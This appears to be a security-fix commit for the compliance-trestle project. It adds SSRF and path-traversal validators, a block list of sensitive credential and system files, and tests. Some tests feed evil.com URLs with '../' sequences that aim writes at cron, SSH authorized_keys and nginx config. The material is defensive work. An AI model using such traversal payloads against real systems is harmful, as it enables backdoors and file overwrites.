    +        # Optionally blocks: RFC 1918 private ranges (based on TRESTLE_BLOCK_PRIVATE_IPS env var)
    +        block_private = get_block_private_ips_config()
    +        self._url_validator = URLSecurityValidator(block_private_ips=block_private)
    +        self._url_validator.validate_url(uri)
    +
             self._username = None
             self._password = None
             u = parse.urlparse(self._uri)
    @@ -262,14 +291,31 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 )
             if u.hostname is None:
                 raise TrestleError(f'Cache request for {self._uri} requires hostname')
    +
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             https_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URI path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URI path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             https_cached_dir = https_cached_dir / path_parent
             https_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = https_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
    +        # Re-validate URL before fetch to prevent DNS rebinding attacks
    +        # This closes the TOCTOU window between init and actual request
    +        self._url_validator.validate_url(self._url)
    +
             auth = None
             verify = None
             # This order reflects requests library behavior: REQUESTS_CA_BUNDLE comes first.
    @@ -313,6 +359,14 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             """
             logger.debug(f'initialize SFTPFetcher for uri {uri}')
             super().__init__(trestle_root, uri)
    +
    +        # Security validation: Check URL for SSRF vulnerabilities
    +        # Always blocks: loopback, link-local, cloud metadata endpoints
    +        # Optionally blocks: RFC 1918 private ranges (based on TRESTLE_BLOCK_PRIVATE_IPS env var)
    +        block_private = get_block_private_ips_config()
    +        self._url_validator = URLSecurityValidator(block_private_ips=block_private)
    +        self._url_validator.validate_url(uri)
    +
             # Is this a valid URI, however? Username and password are optional, of course.
             try:
                 u = parse.urlparse(self._uri)
    @@ -329,19 +383,35 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 logger.warning(f'Malformed URI, cannot parse path in URL {self._uri}')
                 raise TrestleError(f'Cache request for invalid input URI: missing file path {self._uri}')
     
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             sftp_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URL path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URL path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             sftp_cached_dir = sftp_cached_dir / path_parent
             sftp_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
             """Fetch remote object and update the cache if appropriate and possible to do so.
     
             Authentication relies on the user's private key being either active via ssh-agent or
             supplied via environment variable SSH_KEY. In the latter case, it must not require a passphrase prompt.
             """
    +        # Re-validate URL before fetch to prevent DNS rebinding attacks
    +        # This closes the TOCTOU window between init and actual request
    +        self._url_validator.validate_url(self._uri)
    +
             u = parse.urlparse(self._uri)
             client = paramiko.SSHClient()
             # Must pick up host keys from the default known_hosts on this environment:
    @@ -358,9 +428,11 @@ def _do_fetch(self) -> None:
                 look_for_keys = True
     
             username = getpass.getuser() if not u.username else u.username
    +        # u.hostname is guaranteed to be non-None due to earlier validation
    +        hostname = u.hostname if u.hostname else 'localhost'
             try:
                 client.connect(
    -                u.hostname,
    +                hostname,
                     username=username,
                     password=u.password,
                     pkey=pkey,
    
  • trestle/core/remote/security.py+470 0 added
    @@ -0,0 +1,470 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""
    +Security validation utilities for remote fetching operations.
    +
    +This module provides security controls to prevent SSRF, path traversal,
    +and arbitrary file access vulnerabilities.
    +"""
    +
    +import ipaddress
    +import logging
    +import os
    +import pathlib
    +import socket
    +from typing import Optional, Set
    +from urllib import parse
    +
    +from trestle.common.err import TrestleError
    +
    +
    +def get_block_private_ips_config() -> bool:
    +    """Get the TRESTLE_BLOCK_PRIVATE_IPS configuration from environment.
    +
    +    Returns:
    +        True if private IPs should be blocked, False otherwise (default).
    +
    +    The environment variable can be set to:
    +    - 'true', '1', 'yes', 'on' (case-insensitive) to enable blocking
    +    - Any other value or unset to disable blocking (allow private IPs)
    +    """
    +    env_value = os.environ.get('TRESTLE_BLOCK_PRIVATE_IPS', '').lower()
    +    return env_value in ('true', '1', 'yes', 'on')
    +
    +
    +logger = logging.getLogger(__name__)
    +
    +# Always blocked - zero legitimate use for OSCAL fetching
    +# These ranges are blocked regardless of configuration
    +ALWAYS_BLOCKED_NETWORKS = [
    +    ipaddress.ip_network('127.0.0.0/8'),  # Loopback
    +    ipaddress.ip_network('::1/128'),  # IPv6 loopback
    +    ipaddress.ip_network('169.254.0.0/16'),  # Link-local (includes metadata endpoints)
    +    ipaddress.ip_network('fe80::/10'),  # IPv6 link-local
    +]
    +
    +# RFC 1918 private ranges - optionally blocked based on configuration
    +# These are allowed by default to support private GitLab/internal OSCAL repositories
    +PRIVATE_IP_NETWORKS = [
    +    ipaddress.ip_network('10.0.0.0/8'),
    +    ipaddress.ip_network('172.16.0.0/12'),
    +    ipaddress.ip_network('192.168.0.0/16'),
    +    ipaddress.ip_network('fc00::/7'),  # IPv6 unique local
    +]
    +
    +# Cloud metadata endpoints that should be blocked
    +# These are always blocked regardless of configuration
    +METADATA_HOSTNAMES = {
    +    '169.254.169.254',  # AWS, Azure, GCP
    +    'metadata.google.internal',  # GCP
    +    'metadata.azure.com',  # Azure (alternative)
    +    '100.100.100.200',  # Alibaba Cloud
    +}
    +
    +
    +class URLSecurityValidator:
    +    """Validates URLs to prevent SSRF attacks.
    +
    +    Implements two-tiered SSRF protection:
    +    1. Always blocked: loopback, link-local, and cloud metadata endpoints
    +    2. Optionally blocked: RFC 1918 private ranges (configurable via block_private_ips)
    +    """
    +
    +    def __init__(self, block_private_ips: bool = False, allowed_domains: Optional[Set[str]] = None):
    +        """Initialize URL security validator.
    +
    +        Args:
    +            block_private_ips: If True, block RFC 1918 private IP ranges (default: False).
    +                              Always-blocked ranges (loopback, link-local, metadata) are blocked regardless.
    +            allowed_domains: Optional set of allowed domain names. If provided, only these domains are allowed.
    +        """
    +        self.block_private_ips = block_private_ips
    +        self.allowed_domains = allowed_domains
    +
    +    def validate_url(self, url: str) -> None:
    +        """Validate a URL for security issues.
    +
    +        This method resolves the hostname and validates all resolved IPs to prevent SSRF attacks.
    +
    +        To mitigate DNS rebinding attacks, this validation is called both at initialization and
    +        immediately before each fetch operation, minimizing the TOCTOU window.
    +
    +        Args:
    +            url: The URL to validate
    +
    +        Raises:
    +            TrestleError: If the URL is deemed unsafe
    +        """
    +        parsed = self._parse_and_validate_url(url)
    +        # hostname is guaranteed to be non-None by _parse_and_validate_url
    +        hostname = parsed.hostname.lower()  # type: ignore
    +
    +        self._check_metadata_endpoints(hostname)
    +        self._check_domain_allowlist(hostname)
    +
    +        ip_addresses = self._resolve_hostname(hostname)
    +
    +        for ip_str in ip_addresses:
    +            ip_addr = self._parse_ip_address(ip_str, hostname)
    +            self._check_blocked_networks(ip_addr, hostname)
    +            self._check_private_networks(ip_addr, hostname)
    +
    +        self._check_suspicious_ports(parsed, url)
    +
    +    def _parse_and_validate_url(self, url: str) -> parse.ParseResult:
    +        """Parse and validate basic URL structure."""
    +        try:
    +            parsed = parse.urlparse(url)
    +        except Exception as e:
    +            raise TrestleError(f'Invalid URL format: {url}') from e
    +
    +        if not parsed.scheme or not parsed.hostname:
    +            raise TrestleError(f'URL must include scheme and hostname: {url}')
    +
    +        if parsed.scheme not in ['https', 'sftp']:
    +            raise TrestleError(f'Only HTTPS or SFTP schemes are allowed for remote URLs, got: {parsed.scheme}')
    +
    +        return parsed
    +
    +    def _check_metadata_endpoints(self, hostname: str) -> None:
    +        """Check if hostname is a blocked metadata endpoint."""
    +        if hostname in METADATA_HOSTNAMES:
    +            raise TrestleError(
    +                f'Access to cloud metadata endpoints is not allowed: {hostname}. '
    +                'This is a security restriction to prevent SSRF attacks.'
    +            )
    +
    +    def _check_domain_allowlist(self, hostname: str) -> None:
    +        """Check if hostname is in the allowed domains list."""
    +        if self.allowed_domains is not None:
    +            if hostname not in self.allowed_domains:
    +                raise TrestleError(
    +                    f'Domain {hostname} is not in the allowed domains list. '
    +                    f'Allowed domains: {", ".join(sorted(self.allowed_domains))}'
    +                )
    +
    +    def _resolve_hostname(self, hostname: str) -> list:
    +        """Resolve hostname to IP addresses."""
    +        try:
    +            addr_info = socket.getaddrinfo(hostname, None)
    +            ip_addresses = [str(info[4][0]) for info in addr_info]
    +        except socket.gaierror as e:
    +            raise TrestleError(f'Unable to resolve hostname {hostname}: {e}') from e
    +
    +        if not ip_addresses:
    +            raise TrestleError(f'No IP addresses resolved for hostname {hostname}')
    +
    +        return ip_addresses
    +
    +    def _parse_ip_address(self, ip_str: str, hostname: str) -> ipaddress.IPv4Address | ipaddress.IPv6Address:
    +        """Parse IP address string."""
    +        try:
    +            return ipaddress.ip_address(ip_str)
    +        except ValueError as e:
    +            raise TrestleError(f'Invalid IP address {ip_str} for hostname {hostname}: {e}') from e
    +
    +    def _check_blocked_networks(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Check if IP is in always-blocked networks (Tier 1)."""
    +        for network in ALWAYS_BLOCKED_NETWORKS:
    +            if ip_addr in network:
    +                raise TrestleError(
    +                    f'Access to {network} addresses is blocked: {hostname} resolves to {ip_addr}. '
    +                    f'This range includes loopback, link-local, and cloud metadata endpoints. '
    +                    f'This is a security restriction to prevent SSRF attacks.'
    +                )
    +
    +    def _check_private_networks(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Check if IP is in private networks (Tier 2)."""
    +        if self.block_private_ips:
    +            self._block_private_ip(ip_addr, hostname)
    +        else:
    +            self._warn_private_ip(ip_addr, hostname)
    +
    +    def _block_private_ip(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Block access to private IP addresses when configured."""
    +        for network in PRIVATE_IP_NETWORKS:
    +            if ip_addr in network:
    +                raise TrestleError(
    +                    f'Access to private IP addresses is blocked: {hostname} resolves to {ip_addr} '
    +                    f'which is in private network {network}. '
    +                    f'This is blocked because TRESTLE_BLOCK_PRIVATE_IPS is enabled. '
    +                    f'To allow access to private networks, unset this environment variable.'
    +                )
    +
    +    def _warn_private_ip(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Log warning when accessing private IP addresses."""
    +        for network in PRIVATE_IP_NETWORKS:
    +            if ip_addr in network:
    +                logger.warning(
    +                    f'Accessing private IP address: {hostname} resolves to {ip_addr} in network {network}. '
    +                    f'This is allowed by default to support private GitLab/internal OSCAL repositories. '
    +                    f'To block private IPs, set TRESTLE_BLOCK_PRIVATE_IPS=true.'
    +                )
    +                break  # Only log once per IP
    +
    +    def _check_suspicious_ports(self, parsed: parse.ParseResult, url: str) -> None:
    +        """Check for non-standard ports."""
    +        if parsed.port is not None:
    +            if (
    +                parsed.scheme == 'https'
    +                and parsed.port not in [443]
    +                or parsed.scheme == 'sftp'
    +                and parsed.port not in [22]
    +            ):
    +                logger.warning(
    +                    f'Non-standard port {parsed.port} detected in URL {url}. This may indicate a security risk.'
    +                )
    +
    +
    +class PathSecurityValidator:
    +    """Validator for ensuring file paths remain within allowed boundaries."""
    +
    +    @staticmethod
    +    def validate_url_path_for_cache(url_path: str) -> None:
    +        """
    +        Validate a URL path component to prevent path traversal attacks.
    +
    +        Detects path traversal attempts (..) and raises an exception to block the attack.
    +        This prevents directory traversal attacks when constructing cache file paths.
    +
    +        Args:
    +            url_path: The path component from a URL (e.g., from urlparse().path)
    +
    +        Raises:
    +            TrestleError: If path contains traversal sequences (..)
    +
    +        Example:
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # No exception
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')  # Raises TrestleError
    +        """
    +        # Check for path traversal sequences
    +        if '..' in url_path:
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked. '
    +                f'URL path "{url_path}" contains ".." sequences which could '
    +                f'allow writing files outside the cache directory.'
    +            )
    +
    +    @staticmethod
    +    def validate_cache_path(cache_path: pathlib.Path, cache_root: pathlib.Path) -> None:
    +        """
    +        Validate that a cache file path stays within the cache directory.
    +
    +        Uses path resolution and relative_to() to ensure the resolved cache path
    +        is actually within the cache root directory, preventing path traversal attacks.
    +
    +        Args:
    +            cache_path: The proposed cache file path to validate
    +            cache_root: The root cache directory that must contain the cache_path
    +
    +        Raises:
    +            TrestleError: If cache_path resolves outside cache_root
    +
    +        Example:
    +            >>> cache_root = pathlib.Path('/home/user/.trestle/cache')
    +            >>> cache_path = cache_root / 'evil.com' / '..' / '..' / 'etc' / 'passwd'
    +            >>> validate_cache_path(cache_path, cache_root)  # Raises TrestleError
    +        """
    +        # Resolve both paths to absolute, normalized paths
    +        resolved_cache = cache_path.resolve()
    +        resolved_root = cache_root.resolve()
    +
    +        try:
    +            # Check if cache path is relative to (within) cache root
    +            resolved_cache.relative_to(resolved_root)
    +
    +        except ValueError as e:
    +            # relative_to() raises ValueError if path is not relative to root
    +            raise TrestleError(
    +                f'Security violation: Cache path traversal blocked. '
    +                f'Attempted to write to "{resolved_cache}" which is outside '
    +                f'the cache directory "{resolved_root}"'
    +            ) from e
    +        except Exception as e:
    +            raise TrestleError(f'Error validating cache path "{cache_path}": {e}') from e
    +
    +    @staticmethod
    +    def validate_trestle_uri_path(uri_path: str) -> None:
    +        """
    +        Validate a trestle:// URI path component to prevent path traversal attacks.
    +
    +        Detects path traversal attempts (..) in trestle:// URIs and raises an exception.
    +        This prevents directory traversal when resolving trestle:// references.
    +
    +        Args:
    +            uri_path: The path component after 'trestle://' prefix
    +
    +        Raises:
    +            TrestleError: If path contains traversal sequences (..)
    +
    +        Example:
    +            >>> PathSecurityValidator.validate_trestle_uri_path('catalogs/nist/catalog.json')  # No exception
    +            >>> PathSecurityValidator.validate_trestle_uri_path('../../etc/passwd')  # Raises TrestleError
    +        """
    +        # Check for path traversal sequences
    +        if '..' in uri_path:
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked in trestle:// URI. '
    +                f'URI path "{uri_path}" contains ".." sequences which could '
    +                f'allow reading files outside the trestle workspace.'
    +            )
    +
    +    @staticmethod
    +    def validate_local_path(local_path: pathlib.Path, trestle_root: pathlib.Path) -> None:
    +        """
    +        Validate that a local file path stays within the trestle workspace.
    +
    +        Uses path resolution and is_relative_to() to ensure the resolved local path
    +        is actually within the trestle root directory, preventing path traversal attacks.
    +
    +        Args:
    +            local_path: The proposed local file path to validate
    +            trestle_root: The trestle root directory that must contain the local_path
    +
    +        Raises:
    +            TrestleError: If local_path resolves outside trestle_root
    +
    +        Example:
    +            >>> trestle_root = pathlib.Path('/home/user/trestle-workspace')
    +            >>> local_path = trestle_root / 'catalogs' / '..' / '..' / 'etc' / 'passwd'
    +            >>> validate_local_path(local_path, trestle_root)  # Raises TrestleError
    +        """
    +        # Resolve both paths to absolute, normalized paths
    +        resolved_local = local_path.resolve()
    +        resolved_root = trestle_root.resolve()
    +
    +        try:
    +            # Check if local path is relative to (within) trestle root
    +            resolved_local.relative_to(resolved_root)
    +
    +        except ValueError as e:
    +            # relative_to() raises ValueError if path is not relative to root
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked. '
    +                f'Attempted to access "{resolved_local}" which is outside '
    +                f'the trestle workspace "{resolved_root}"'
    +            ) from e
    +        except Exception as e:
    +            raise TrestleError(f'Error validating local path "{local_path}": {e}') from e
    +
    +    @staticmethod
    +    def validate_local_file_path(
    +        workspace_root: pathlib.Path, file_path: pathlib.Path, allow_outside_workspace: bool = False
    +    ) -> None:
    +        """Validate that a local file path is safe to access.
    +
    +        This method provides defense-in-depth protection against arbitrary file access
    +        by validating both workspace boundaries and blocking known sensitive system files.
    +
    +        Args:
    +            workspace_root: The trestle workspace root directory
    +            file_path: The file path to validate
    +            allow_outside_workspace: If True, allow access to files outside workspace (default: False)
    +
    +        Raises:
    +            TrestleError: If the path is deemed unsafe
    +
    +        Example:
    +            >>> workspace = pathlib.Path('/home/user/trestle-workspace')
    +            >>> file_path = pathlib.Path('/etc/passwd')
    +            >>> validate_local_file_path(workspace, file_path, allow_outside_workspace=False)
    +            # Raises TrestleError: Access to files outside workspace not allowed
    +            >>> validate_local_file_path(workspace, file_path, allow_outside_workspace=True)
    +            # Raises TrestleError: Attempt to access sensitive system file
    +        """
    +        resolved_workspace = workspace_root.resolve()
    +        resolved_file = file_path.resolve()
    +
    +        try:
    +            if not allow_outside_workspace:
    +                # Ensure file is within workspace
    +                resolved_file.relative_to(resolved_workspace)
    +        except ValueError as e:
    +            if not allow_outside_workspace:
    +                raise TrestleError(
    +                    f'Access to files outside the trestle workspace is not allowed: {file_path}. '
    +                    'This is a security restriction to prevent arbitrary file access.'
    +                ) from e
    +
    +        # Additional checks for sensitive system files
    +        # This provides defense-in-depth even when allow_outside_workspace=True
    +        # Comprehensive list covering Linux, macOS, and Windows
    +        sensitive_paths = [
    +            # Linux/Unix system files
    +            '/etc/passwd',
    +            '/etc/shadow',
    +            '/etc/group',
    +            '/etc/gshadow',
    +            '/etc/sudoers',
    +            '/etc/hosts',
    +            '/etc/ssh',
    +            '/etc/ssl',
    +            '/etc/pki',
    +            '/etc/security',
    +            '/proc/self/environ',
    +            '/proc/self/cmdline',
    +            '/proc/self/maps',
    +            '/sys/class/net',
    +            # User credential files (Linux/macOS)
    +            '/.ssh',
    +            '/.aws',
    +            '/.gnupg',
    +            '/.docker',
    +            '/.kube',
    +            '/.config/gcloud',
    +            '/root/.ssh',
    +            '/root/.aws',
    +            '/root/.gnupg',
    +            # macOS specific
    +            '/Library/Keychains',
    +            '/Library/',  # Broad but catches user home directories
    +            # Windows system directories
    +            'C:\\Windows\\System32',
    +            'C:\\Windows\\SysWOW64',
    +            'C:\\Windows\\System',
    +            'C:\\Windows\\security',
    +            'C:\\ProgramData\\Microsoft\\Crypto',
    +            # Windows credential files
    +            '\\AppData\\Local\\Microsoft\\Credentials',
    +            '\\AppData\\Roaming\\Microsoft\\Credentials',
    +            '\\AppData\\Local\\Microsoft\\Vault',
    +            # Common sensitive config locations
    +            '/var/log',
    +            '/var/run',
    +            'C:\\Windows\\Logs',
    +            # Database files
    +            '/var/lib/mysql',
    +            '/var/lib/postgresql',
    +            'C:\\Program Files\\MySQL',
    +            'C:\\Program Files\\PostgreSQL',
    +        ]
    +
    +        # Check if the resolved path contains any sensitive patterns
    +        # Use both the original path and resolved path for checking
    +        file_str = str(resolved_file).lower()
    +        original_str = str(file_path).lower()
    +
    +        for sensitive in sensitive_paths:
    +            sensitive_lower = sensitive.lower()
    +            # Check both original and resolved paths
    +            if sensitive_lower in file_str or sensitive_lower in original_str:
    +                raise TrestleError(
    +                    f'Attempt to access potentially sensitive system file: {file_path}. '
    +                    'This may indicate a security issue.'
    +                )
    +
    +
    +# Made with Bob
    
89f4e53d159e

Merge commit from fork

https://github.com/oscal-compass/compliance-trestleLou DeGenaroMay 18, 2026via ghsa-ref
3 files changed · +363 4
  • tests/trestle/core/remote/cache_security_test.py+235 0 added
    @@ -0,0 +1,235 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""Security tests for cache path traversal vulnerabilities."""
    +
    +import pathlib
    +
    +import pytest
    +
    +import tests.test_utils as test_utils
    +
    +from trestle.common.err import TrestleError
    +from trestle.core.remote.cache import HTTPSFetcher, SFTPFetcher
    +from trestle.core.remote.security import PathSecurityValidator
    +
    +
    +class TestPathValidation:
    +    """Test path validation functions."""
    +
    +    def test_validate_url_path_normal(self) -> None:
    +        """Test that normal paths pass validation."""
    +        PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/path/to/file.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/data/catalog.json')  # Should not raise
    +
    +    def test_validate_url_path_blocks_traversal(self) -> None:
    +        """Test that paths with .. are blocked."""
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/path/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../../../../tmp/pwned.json')
    +
    +
    +class TestPathSecurityValidator:
    +    """Test path security validation."""
    +
    +    def test_validate_cache_path_within_cache(self, tmp_path: pathlib.Path) -> None:
    +        """Test that valid paths within cache are accepted."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Valid path within cache
    +        valid_path = cache_root / 'example.com' / 'data' / 'file.json'
    +        PathSecurityValidator.validate_cache_path(valid_path, cache_root)  # Should not raise
    +
    +    def test_validate_cache_path_traversal_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that path traversal outside cache is blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Attempt to traverse outside cache
    +        evil_path = cache_root / '..' / '..' / 'etc' / 'passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_absolute_outside_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that absolute paths outside cache are blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Absolute path outside cache
    +        evil_path = pathlib.Path('/tmp/pwned.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_unexpected_error(self, tmp_path: pathlib.Path, monkeypatch) -> None:
    +        """Test that unexpected errors during validation are caught and wrapped."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        valid_path = cache_root / 'example.com' / 'file.json'
    +
    +        # Mock relative_to() to raise an unexpected exception (not ValueError)
    +        def mock_relative_to(self, other, *args, **kwargs):
    +            # Raise a non-ValueError exception to trigger the generic except block
    +            raise RuntimeError('Unexpected filesystem error')
    +
    +        monkeypatch.setattr(pathlib.Path, 'relative_to', mock_relative_to)
    +
    +        with pytest.raises(TrestleError, match='Error validating cache path'):
    +            PathSecurityValidator.validate_cache_path(valid_path, cache_root)
    +
    +
    +class TestHTTPSFetcherPathTraversal:
    +    """Test HTTPSFetcher protection against path traversal attacks."""
    +
    +    def test_https_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious URL with path traversal
    +        evil_url = 'https://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_https_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal URL without traversal
    +        normal_url = 'https://example.com/catalogs/nist/catalog.json'
    +
    +        # Should not raise
    +        fetcher = HTTPSFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_https_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # URL with embedded traversal should be blocked
    +        url = 'https://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, url)
    +
    +
    +class TestSFTPFetcherPathTraversal:
    +    """Test SFTPFetcher protection against path traversal attacks."""
    +
    +    def test_sftp_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious SFTP URL with path traversal
    +        evil_url = 'sftp://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +    def test_sftp_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal SFTP URL without traversal
    +        normal_url = 'sftp://example.com/data/catalog.json'
    +
    +        # Should not raise
    +        fetcher = SFTPFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_sftp_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # SFTP URL with embedded traversal should be blocked
    +        url = 'sftp://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, url)
    +
    +
    +class TestRealWorldAttackVectors:
    +    """Test real-world attack vectors from the security advisory."""
    +
    +    def test_attack_vector_cron_injection(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of cron job injection attack vector."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /etc/cron.d/backdoor
    +        evil_url = 'https://evil.com/../../../../../../../etc/cron.d/backdoor'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_ssh_keys(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SSH authorized_keys injection."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to ~/.ssh/authorized_keys
    +        evil_url = 'https://evil.com/../../../../../../../root/.ssh/authorized_keys'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_tmp_write(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of arbitrary /tmp file write."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /tmp/pwned.json
    +        evil_url = 'https://evil.com/../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_config_overwrite(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of config file overwrite."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Overwrite nginx config
    +        evil_url = 'https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
